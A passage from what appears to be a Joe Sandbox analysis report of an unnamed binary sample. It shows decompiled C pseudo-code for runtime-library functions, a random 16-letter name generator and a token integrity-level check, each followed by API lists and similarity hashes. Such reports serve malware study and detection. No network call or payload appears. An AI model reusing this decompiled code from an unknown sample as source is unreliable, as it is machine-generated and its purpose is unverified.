						E00C87E00(_t28);
						_t18 = _a4;
						if(_t18 == 0) {
							L13:
							 *((intOrPtr*)(_t28 + 4)) = _t26;
							 *((intOrPtr*)(_t28 + 8)) = 1;
							goto L14;
						} else {
							_t22 = L"__crt";
							while(1) {
								_t23 =  *_t18;
								if(_t23 !=  *_t22) {
									break;
								}
								if(_t23 == 0) {
									L8:
									_t18 = 0;
								} else {
									_t24 =  *((intOrPtr*)(_t18 + 2));
									if(_t24 != _t22[2]) {
										break;
									} else {
										_t18 = _t18 + 4;
										_t22 =  &(_t22[4]);
										if(_t24 != 0) {
											continue;
										} else {
											goto L8;
										}
									}
								}
								L11:
								if(_t18 != 0) {
									goto L13;
								} else {
									 *((intOrPtr*)(_t28 + 4)) = _t21;
									 *((intOrPtr*)(_t28 + 8)) = 2;
									return _t28;
								}
								goto L15;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L11;
						}
					}
				}
				L15:
			}














                                                                                                                                                                                          0x00c87e5a
                                                                                                                                                                                          0x00c87e5e
                                                                                                                                                                                          0x00c87e6a
                                                                                                                                                                                          0x00c87e72
                                                                                                                                                                                          0x00c87e74
                                                                                                                                                                                          0x00c87e7c
                                                                                                                                                                                          0x00c87ecd
                                                                                                                                                                                          0x00c87ed0
                                                                                                                                                                                          0x00c87e7e
                                                                                                                                                                                          0x00c87e7e
                                                                                                                                                                                          0x00c87e81
                                                                                                                                                                                          0x00c87e83
                                                                                                                                                                                          0x00c87ef6
                                                                                                                                                                                          0x00c87efb
                                                                                                                                                                                          0x00c87e85
                                                                                                                                                                                          0x00c87e87
                                                                                                                                                                                          0x00c87e8e
                                                                                                                                                                                          0x00c87e92
                                                                                                                                                                                          0x00c87e97
                                                                                                                                                                                          0x00c87e9d
                                                                                                                                                                                          0x00c87eeb
                                                                                                                                                                                          0x00c87eeb
                                                                                                                                                                                          0x00c87eee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87e9f
                                                                                                                                                                                          0x00c87e9f
                                                                                                                                                                                          0x00c87ea4
                                                                                                                                                                                          0x00c87ea4
                                                                                                                                                                                          0x00c87eaa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87eaf
                                                                                                                                                                                          0x00c87ec6
                                                                                                                                                                                          0x00c87ec6
                                                                                                                                                                                          0x00c87eb1
                                                                                                                                                                                          0x00c87eb1
                                                                                                                                                                                          0x00c87eb9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87ebb
                                                                                                                                                                                          0x00c87ebb
                                                                                                                                                                                          0x00c87ebe
                                                                                                                                                                                          0x00c87ec4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87ec4
                                                                                                                                                                                          0x00c87eb9
                                                                                                                                                                                          0x00c87ed6
                                                                                                                                                                                          0x00c87ed8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87edb
                                                                                                                                                                                          0x00c87edb
                                                                                                                                                                                          0x00c87ede
                                                                                                                                                                                          0x00c87eea
                                                                                                                                                                                          0x00c87eea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87ed8
                                                                                                                                                                                          0x00c87ed1
                                                                                                                                                                                          0x00c87ed3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c87ed3
                                                                                                                                                                                          0x00c87e9d
                                                                                                                                                                                          0x00c87e83
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000005,00000000,?,761B4C30,00C88001,?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E5A
                                                                                                                                                                                            • Part of subcall function 00D05D61: __getptd_noexit.LIBCMT ref: 00D05D61
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E74
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E85
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$__getptd_noexit
                                                                                                                                                                                          • String ID: __crt
                                                                                                                                                                                          • API String ID: 101986603-4026493915
                                                                                                                                                                                          • Opcode ID: 9b3f85e699844ac39ce8f61c8ded9fdce28d606f9cc88fa1b3ea2bd4bfaa0c47
                                                                                                                                                                                          • Instruction ID: b6e6faaf2f258b4b589204f647fe22fbdc965c271ea0de0f38102e4ba488b134
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b3f85e699844ac39ce8f61c8ded9fdce28d606f9cc88fa1b3ea2bd4bfaa0c47
                                                                                                                                                                                          • Instruction Fuzzy Hash: A011EF227042104FC720BFB99844666B394EF61B6972506AAE915CB250FB32DD01C364
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC257A Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00CC257A(void* __ebx, void* __edi, signed int _a4) {
				signed int _v0;
				char _v20;
				signed int _v24;
				intOrPtr* _v40;
				signed int _t24;
				signed int _t25;
				signed int _t31;
				signed int _t32;
				void* _t41;
				signed int _t42;
				signed int _t46;
				signed int _t50;
				void* _t53;
				void* _t55;
				void* _t59;

				_t53 = __edi;
				_t41 = __ebx;
				_t55 = _t59;
				_t42 = _a4;
				if(_t42 > 0) {
					_t25 = _t24 | 0xffffffff;
					_t50 = _t25 % _t42;
					__eflags = _t25 / _t42 - 0xd8;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_v0 = _v0 & 0x00000000;
						E00D06117( &_v20,  &_v0);
						_v20 = 0xd3e0a0;
						_t31 = E00D00729( &_v20, 0xd59840);
						asm("int3");
						_push(_t55);
						_t46 = _v24;
						__eflags = _t46;
						if(_t46 > 0) {
							_t32 = _t31 | 0xffffffff;
							_t50 = _t32 % _t46;
							__eflags = _t32 / _t46 - 0x10;
							if(_t32 / _t46 >= 0x10) {
								goto L6;
							} else {
								_t17 =  &_v0;
								 *_t17 = _v0 & 0x00000000;
								__eflags =  *_t17;
								E00D06117( &_v20,  &_v0);
								_v20 = 0xd3e0a0;
								E00D00729( &_v20, 0xd59840);
								asm("int3");
								return  *_v40;
							}
						} else {
							_t46 = 0;
							__eflags = 0;
							L6:
							__eflags = _t46 << 4;
							return E00D0167F(_t41, _t50, _t53, _t46 << 4, _t46 << 4);
						}
					}
				} else {
					_t42 = 0;
					L2:
					return E00D0167F(_t41, _t50, _t53, _t42 * 0xd8, _t42 * 0xd8);
				}
			}


















                                                                                                                                                                                          0x00cc257a
                                                                                                                                                                                          0x00cc257a
                                                                                                                                                                                          0x00cc257b
                                                                                                                                                                                          0x00cc257d
                                                                                                                                                                                          0x00cc2585
                                                                                                                                                                                          0x00cc2598
                                                                                                                                                                                          0x00cc259d
                                                                                                                                                                                          0x00cc259f
                                                                                                                                                                                          0x00cc25a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc25a6
                                                                                                                                                                                          0x00cc25a6
                                                                                                                                                                                          0x00cc25b1
                                                                                                                                                                                          0x00cc25bf
                                                                                                                                                                                          0x00cc25c6
                                                                                                                                                                                          0x00cc25cb
                                                                                                                                                                                          0x00cc25cc
                                                                                                                                                                                          0x00cc25cf
                                                                                                                                                                                          0x00cc25d5
                                                                                                                                                                                          0x00cc25d7
                                                                                                                                                                                          0x00cc25e7
                                                                                                                                                                                          0x00cc25ec
                                                                                                                                                                                          0x00cc25ee
                                                                                                                                                                                          0x00cc25f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc25f3
                                                                                                                                                                                          0x00cc25f3
                                                                                                                                                                                          0x00cc25f3
                                                                                                                                                                                          0x00cc25f3
                                                                                                                                                                                          0x00cc25fe
                                                                                                                                                                                          0x00cc260c
                                                                                                                                                                                          0x00cc2613
                                                                                                                                                                                          0x00cc2618
                                                                                                                                                                                          0x00cc261f
                                                                                                                                                                                          0x00cc261f
                                                                                                                                                                                          0x00cc25d9
                                                                                                                                                                                          0x00cc25d9
                                                                                                                                                                                          0x00cc25d9
                                                                                                                                                                                          0x00cc25db
                                                                                                                                                                                          0x00cc25db
                                                                                                                                                                                          0x00cc25e6
                                                                                                                                                                                          0x00cc25e6
                                                                                                                                                                                          0x00cc25d7
                                                                                                                                                                                          0x00cc2587
                                                                                                                                                                                          0x00cc2587
                                                                                                                                                                                          0x00cc2589
                                                                                                                                                                                          0x00cc2597
                                                                                                                                                                                          0x00cc2597

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 00CC25B1
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CC25C6
                                                                                                                                                                                            • Part of subcall function 00D0167F: _malloc.LIBCMT ref: 00D01699
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4063778783-0
                                                                                                                                                                                          • Opcode ID: 81ed698ff011b1eb62b900c693c92b6452df13b64b0f94b9832afc1fa5c0eb94
                                                                                                                                                                                          • Instruction ID: 345461368bf66724e8733f9179c5da7dd1d05c5dc8589866bfe7beaf6fde636f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81ed698ff011b1eb62b900c693c92b6452df13b64b0f94b9832afc1fa5c0eb94
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211C6719101086EDB0CEE64C456FDE77A9DB44350F50866DED2AD61C1DFB0E6088B70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8A750 Relevance: 6.1, APIs: 4, Instructions: 54sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E00C8A750(void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v4;
				char _v526;
				void* _v528;
				void* __ebx;
				signed int _t16;
				signed int _t23;
				signed short* _t25;
				intOrPtr _t26;
				signed int _t27;
				signed int _t34;
				signed int _t37;
				short _t38;
				intOrPtr _t41;
				signed int _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t35 = __edx;
				_t42 =  &_v528;
				_t16 =  *0xd64070; // 0x8a9e1774
				_v4 = _t16 ^ _t42;
				_t18 = 0;
				_t44 = __esi;
				if(__esi != 0) {
					_push(_t26);
					 *((short*)(__esi)) = 0;
					E00D0B3EF(E00D07225(__ecx, __edx, _t44, 0));
					Sleep(0xa);
					_v528 = 0;
					E00D006A0(__edi,  &_v526, 0, 0x208);
					_t42 = _t42 + 0x14;
					_t27 = 0;
					do {
						_t23 = E00D0B401(0);
						asm("cdq");
						_t37 = _t23 % 0x1a;
						if((_t27 & 0x00000001) != 0) {
							_t38 = _t37 + 0x41;
							__eflags = _t38;
						} else {
							_t38 = _t37 + 0x61;
						}
						 *((short*)(_t42 + 4 + _t27 * 2)) = _t38;
						_t27 = _t27 + 1;
					} while (_t27 < 0x10);
					_t25 =  &_v528;
					_t35 = _t41 - _t25;
					_pop(_t26);
					do {
						_t34 =  *_t25 & 0x0000ffff;
						 *(_t35 + _t25) = _t34;
						_t25 =  &(_t25[1]);
					} while (_t34 != 0);
					_t18 = 1;
				}
				return E00D0071A(_t18, _t26, _v4 ^ _t42, _t35, _t40, _t41);
			}

















                                                                                                                                                                                          0x00c8a750
                                                                                                                                                                                          0x00c8a750
                                                                                                                                                                                          0x00c8a750
                                                                                                                                                                                          0x00c8a750
                                                                                                                                                                                          0x00c8a756
                                                                                                                                                                                          0x00c8a75d
                                                                                                                                                                                          0x00c8a764
                                                                                                                                                                                          0x00c8a766
                                                                                                                                                                                          0x00c8a768
                                                                                                                                                                                          0x00c8a76a
                                                                                                                                                                                          0x00c8a76c
                                                                                                                                                                                          0x00c8a775
                                                                                                                                                                                          0x00c8a77f
                                                                                                                                                                                          0x00c8a792
                                                                                                                                                                                          0x00c8a797
                                                                                                                                                                                          0x00c8a79c
                                                                                                                                                                                          0x00c8a79f
                                                                                                                                                                                          0x00c8a7a1
                                                                                                                                                                                          0x00c8a7a1
                                                                                                                                                                                          0x00c8a7a6
                                                                                                                                                                                          0x00c8a7ac
                                                                                                                                                                                          0x00c8a7b1
                                                                                                                                                                                          0x00c8a7b8
                                                                                                                                                                                          0x00c8a7b8
                                                                                                                                                                                          0x00c8a7b3
                                                                                                                                                                                          0x00c8a7b3
                                                                                                                                                                                          0x00c8a7b3
                                                                                                                                                                                          0x00c8a7bb
                                                                                                                                                                                          0x00c8a7c0
                                                                                                                                                                                          0x00c8a7c1
                                                                                                                                                                                          0x00c8a7c6
                                                                                                                                                                                          0x00c8a7ce
                                                                                                                                                                                          0x00c8a7d0
                                                                                                                                                                                          0x00c8a7d1
                                                                                                                                                                                          0x00c8a7d1
                                                                                                                                                                                          0x00c8a7d4
                                                                                                                                                                                          0x00c8a7d8
                                                                                                                                                                                          0x00c8a7db
                                                                                                                                                                                          0x00c8a7e0
                                                                                                                                                                                          0x00c8a7e0
                                                                                                                                                                                          0x00c8a7f9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __time64.LIBCMT ref: 00C8A76F
                                                                                                                                                                                            • Part of subcall function 00D07225: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00C8A3D7,00000000), ref: 00D07230
                                                                                                                                                                                            • Part of subcall function 00D07225: __aulldiv.LIBCMT ref: 00D07250
                                                                                                                                                                                            • Part of subcall function 00D0B3EF: __getptd.LIBCMT ref: 00D0B3F4
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00C8A77F
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8A797
                                                                                                                                                                                          • _rand.LIBCMT ref: 00C8A7A1
                                                                                                                                                                                            • Part of subcall function 00D0B401: __getptd.LIBCMT ref: 00D0B401
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time__getptd$FileSleepSystem__aulldiv__time64_memset_rand
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3797240984-0
                                                                                                                                                                                          • Opcode ID: 482ada74b4b839fb3e2df1e56562ca99bb8df36a30459c244c60e967dd6b4c34
                                                                                                                                                                                          • Instruction ID: 8c451f688b6bed575f441f4f31a49bb28591409765cc6a6a5ea901aefa8c8cff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 482ada74b4b839fb3e2df1e56562ca99bb8df36a30459c244c60e967dd6b4c34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01D6B1A143006BE714AB34D89A76A72E1EF98304F50892AF45AC72D1F675D8045767
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F930 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8F930(void* __ecx, signed int* __esi, void* __eflags) {
				long _v4;
				void _v8;
				void* _v12;
				void* _v16;
				signed int _t15;
				signed int _t17;
				signed int _t28;
				void* _t32;

				if(E00C8F8D0(__ecx, __esi, _t32, __eflags) != 0) {
					_v12 = 0;
					_t28 = 0;
					_t15 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
					__eflags = _t15;
					if(_t15 != 0) {
						_v8 = 0;
						_v4 = 0;
						_t17 = GetTokenInformation(_v12, 0x14,  &_v8, 4,  &_v4);
						__eflags = _t17;
						if(_t17 != 0) {
							_t28 = 1;
							__eflags = __esi;
							if(__esi != 0) {
								__eflags = _v12;
								_t10 = _v12 != 0;
								__eflags = _t10;
								 *__esi = 0 | _t10;
							}
						}
						CloseHandle(_v16);
						return _t28;
					} else {
						return _t15;
					}
				} else {
					if(__esi != 0) {
						 *__esi = 1;
					}
					return 1;
				}
			}











                                                                                                                                                                                          0x00c8f93a
                                                                                                                                                                                          0x00c8f957
                                                                                                                                                                                          0x00c8f95f
                                                                                                                                                                                          0x00c8f968
                                                                                                                                                                                          0x00c8f96e
                                                                                                                                                                                          0x00c8f970
                                                                                                                                                                                          0x00c8f98a
                                                                                                                                                                                          0x00c8f98e
                                                                                                                                                                                          0x00c8f992
                                                                                                                                                                                          0x00c8f998
                                                                                                                                                                                          0x00c8f99a
                                                                                                                                                                                          0x00c8f99c
                                                                                                                                                                                          0x00c8f9a1
                                                                                                                                                                                          0x00c8f9a3
                                                                                                                                                                                          0x00c8f9a7
                                                                                                                                                                                          0x00c8f9ab
                                                                                                                                                                                          0x00c8f9ab
                                                                                                                                                                                          0x00c8f9ae
                                                                                                                                                                                          0x00c8f9ae
                                                                                                                                                                                          0x00c8f9a3
                                                                                                                                                                                          0x00c8f9b5
                                                                                                                                                                                          0x00c8f9c1
                                                                                                                                                                                          0x00c8f972
                                                                                                                                                                                          0x00c8f976
                                                                                                                                                                                          0x00c8f976
                                                                                                                                                                                          0x00c8f93c
                                                                                                                                                                                          0x00c8f93e
                                                                                                                                                                                          0x00c8f940
                                                                                                                                                                                          0x00c8f940
                                                                                                                                                                                          0x00c8f94e
                                                                                                                                                                                          0x00c8f94e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00C8F961
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00C8F968
                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000014(TokenIntegrityLevel),00000000,00000004,00000000), ref: 00C8F992
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C8F9B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 215268677-0
                                                                                                                                                                                          • Opcode ID: 6e9cc2d30420d0b36996d70701e170740c0ad7790794e1463464a505bf9d6af4
                                                                                                                                                                                          • Instruction ID: bea0185917a77e10a7ac52bfc209bc2fd32fe0d56d0781450420030cf6eda0bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e9cc2d30420d0b36996d70701e170740c0ad7790794e1463464a505bf9d6af4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 170180B2604301ABD3109F18E94576F77E8ABD4B08F44842DF9D9C6254E774C909DB53
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC631A Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CC631A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* __edi;
				intOrPtr* _t23;
				void* _t24;
				void* _t25;

				_t23 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 0x1414)) = _a20;
				_t5 = _t23 + 4; // 0x4
				_t21 = _t5;
				 *((intOrPtr*)(__ecx + 0x1418)) = _a8;
				E00D006A0(_t5, _t5, 0, 0x1000);
				_t25 = _t24 + 0xc;
				if(_a12 != 0) {
					E00D03717(_t21, _a12, 0x800);
					_t25 = _t25 + 0xc;
				}
				_t9 = _t23 + 0x1004; // 0x1004
				_t22 = _t9;
				E00D006A0(_t9, _t9, 0, 0x410);
				if(_a16 != 0) {
					E00D03717(_t22, _a16, 0x208);
				}
				return _t23;
			}







                                                                                                                                                                                          0x00cc6321
                                                                                                                                                                                          0x00cc6324
                                                                                                                                                                                          0x00cc632e
                                                                                                                                                                                          0x00cc6337
                                                                                                                                                                                          0x00cc6337
                                                                                                                                                                                          0x00cc633d
                                                                                                                                                                                          0x00cc6343
                                                                                                                                                                                          0x00cc6348
                                                                                                                                                                                          0x00cc634f
                                                                                                                                                                                          0x00cc635a
                                                                                                                                                                                          0x00cc635f
                                                                                                                                                                                          0x00cc635f
                                                                                                                                                                                          0x00cc6367
                                                                                                                                                                                          0x00cc6367
                                                                                                                                                                                          0x00cc6370
                                                                                                                                                                                          0x00cc637c
                                                                                                                                                                                          0x00cc6387
                                                                                                                                                                                          0x00cc638c
                                                                                                                                                                                          0x00cc6394

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset_wcsncpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1825577869-0
                                                                                                                                                                                          • Opcode ID: 83ba769066be74625e7aea6b14152c977933367d5efeed09283d98f1219e60e3
                                                                                                                                                                                          • Instruction ID: 643e9b3721a4704bd60c66694906b66c35630012d024135d23a076830a684475
                                                                                                                                                                                          • Opcode Fuzzy Hash: 83ba769066be74625e7aea6b14152c977933367d5efeed09283d98f1219e60e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B0186725003056BD7119E58DC06FDB77E8EF54B00F044429FA5897291D3F1AAA48BF1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D01C4F Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00D01C4F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xd58a98);
				E00D009BC(__ebx, __edi, __esi);
				_t29 = E00D10D0C(__ebx, _t31);
				_t13 =  *0xd64a28; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00D0EFCA(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0xd64b10; // 0x2a219a8
					 *((intOrPtr*)(_t30 - 0x1c)) = E00D01C11(_t8, _t25, _t27);
